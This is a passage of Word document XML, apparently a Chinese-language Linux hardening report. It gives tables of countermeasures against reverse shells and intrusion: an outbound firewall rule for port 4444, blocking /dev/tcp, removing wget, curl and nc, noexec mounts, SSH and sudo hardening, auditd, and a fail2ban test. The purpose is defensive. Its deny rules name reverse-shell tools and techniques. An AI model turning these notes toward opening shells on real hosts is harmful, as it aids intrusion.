            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>sudo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iptables -A OUTPUT -p </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tcp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--</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>dport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4444 -j REJECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="2402AF4A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="415A61D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封鎖 Bash TCP 反彈技巧</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4368BC0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透過 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>AppArmor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/ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>SELinux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禁止 /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tcp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連線。甚至可重新編譯 bash 移除其支援。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="5A490986" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="160B73B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移除反向 Shell 工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5061FD8E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刪除 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>wget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curl, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>nc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等工具減少被利用機會。或用 sandbox 限制（如 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>Firejail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="3602D54C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EFF4AD2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noexec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掛載目錄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62E63EC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防止 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>, /uploads 被用來執行下載後門：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tmpfs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/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tmp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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tmpfs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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>defaults,noexec,nosuid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0 0（寫入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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>fstab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25BD9443" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74ED8509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二、帳號與密碼控管加強</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af0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7"/>
        <w:gridCol w:w="6139"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="05536547" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2157" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57159B0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防禦措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72E9905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</w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="4130A3D1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2157" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B60F81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強化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/shadow 權限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="021A2CA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確保其為 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>chmod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640 並屬於 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>root:shadow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>，避免 hash 外</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>洩</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="1FEBEDCD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2157" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="020960E6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禁用 root SSH 登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CD7051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修改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/ssh/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>sshd_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>PermitRootLogin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no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="29230E84" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2157" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="390E87CC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安全 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>sudo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設定</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D7C6B0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僅允許指定指令，不可執行 shell 或任意程式；搭配密碼策略與 2FA 實施。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40F09420" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686F75FA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三、啟用日誌與入侵偵測（IDS/IPS）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1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3"/>
        <w:gridCol w:w="6323"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="129C94CA" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1973" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="170DD64F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防禦措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08E34A0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</w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="4DC15EA9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1973" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C04C87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auditd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系統稽核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E8BA18B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追蹤關鍵系統呼叫、檔案變更：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>auditctl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-a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>always,exit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t xml:space="preserve"> -F arch=b64 -S </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>execve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-k suspicious-exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="57E2DF2C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1973" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E595B5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fail2ban 阻擋異常登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1511688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設定 5 次 SSH </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>錯密自動</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>封鎖 IP 10 分鐘，修改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/fail2ban/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>jail.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>maxretry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=5, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>bantime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>=600</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="191A4D73" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1973" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="359891AC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集中日誌與主動告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6323" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3919428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整合 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>rsyslog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+ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>logwatch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或 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>, OSSEC，進行集中分析與即時通報。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2119F9CA" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="321DE35D">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C907905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四、檢查後門與異常活動</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="8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96"/>
        <w:gridCol w:w="6000"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="6294CEFA" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D7FAF5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防禦措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3675DC6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說明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="3C31311E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01D5472F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掃描後門啟動點</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E187AF0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常見位置：~/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>bashrc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cron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rc.local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systemd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自動啟動等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="43C1454A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="463613E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監控可疑程序與連線</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23A6741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定期執行：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>ps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aux, netstat -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>tulnp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lsof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-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>i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檢查異常連線與執行程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="75977D3E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="688C1008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tripwire 比對檔案完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="604FEF2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比對被入侵前後 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>/passwd, /bin/bash 是否被竄改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FACA2F1" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="3FA84725">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3D54A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實際防禦驗證設計</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214A3447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防禦驗證 1：fail2ban 阻擋 SSH 爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C44AB4" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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安裝並設定最大 5 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>次錯密後</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>封鎖 IP：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372BD19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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD3C88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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> nano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/fail2ban/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>jail.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7397D5B7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# 加入以下內容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEC30C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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD56B0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enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B361AC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= ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB6E51D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maxretry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05807D61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bantime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D569EAC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findtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F11FB4E" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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測試：從其他主機</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>連續錯密登入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
